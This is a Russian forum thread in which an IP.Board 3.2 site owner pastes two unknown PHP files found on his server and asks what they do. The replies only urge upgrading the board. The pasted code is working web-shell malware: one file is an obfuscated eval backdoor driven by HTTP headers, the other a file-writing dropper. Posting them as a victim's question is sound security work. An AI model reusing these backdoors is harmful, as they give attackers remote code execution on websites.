EIKA Опубликовано 5 января, 2015 Поделиться Опубликовано 5 января, 2015 (изменено) Здравствуйте! Обнаружил PHP-файл, который не загружал на сервер, а также которого нет в исходном дистре IPB 3.2. Файл называется 5c258130.php. Файл нашел в 2 местах, содержимое отличается: В корне: <?php $_a3dc="x70x72x65x67x5fx72x65x70x6cx61x63x65";$_a3dc("x7cx2ex7cx65","x65x76x61x6cx28x27x65x76x61x6cx28x62x61x73x65x36x34x5fx64x65x63x6fx64x65x28x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7x22x29x29x3bx27x29",'.');?> В папке cache: ============================================================================== URL: /index.php/index.php Date: Tue, 20 Nov 2012 10:16:53 +0000 IP Address: 31.3.250.226 Time Taken: 0.04346 <?php file_put_contents(@$_SERVER[HTTP_FILENAME],base64_decode(@$_SERVER[HTTP_DATA]));echo md5(12345);?> ============================================================================== ============================================================================== ========================= END =================================== ========================= /index.php? =================================== ============================================================================== IP-адрес Великобритании. Я там никогда не хостился и сам из тех сетей не ходил. Сам не программер, оценить код PHP не могу. Тем более, что первый выглядит как упакованный или как какой-то брутфорсер. Внимание, вопросы: 1. Что это такое? 2. Как могло попасть (данные для входа никто не имел, пароли все мегастойкие)? 3. Что оно делало? Точная версия борды: IP.Board Version 3.2.0 (ID:32003) Изменено 5 января, 2015 пользователем EIKA Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
SanyaSamp Опубликовано 5 января, 2015 Поделиться Опубликовано 5 января, 2015 Обновись до 3.4.6 Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
WOLF Опубликовано 5 января, 2015 Поделиться Опубликовано 5 января, 2015 Обновись до 3.4.6 бессмысленные посты не нужно писать. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
SanyaSamp Опубликовано 5 января, 2015 Поделиться Опубликовано 5 января, 2015 бессмысленные посты не нужно писать. Почему бессмысленные? IPB 3.2 забита уязвимостями Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
WOLF Опубликовано 5 января, 2015 Поделиться Опубликовано 5 января, 2015 Почему бессмысленные? IPB 3.2 забита уязвимостями ТС спрашивает о файле, а не о том, как защитится. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
EIKA Опубликовано 5 января, 2015 Автор Поделиться Опубликовано 5 января, 2015 Обновляться буду, но позже, ибо тут немного дизайн подпилен, уже не помню где и что я там пилил... Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.
Примечание: Ваш пост будет проверен модератором, прежде чем станет видимым.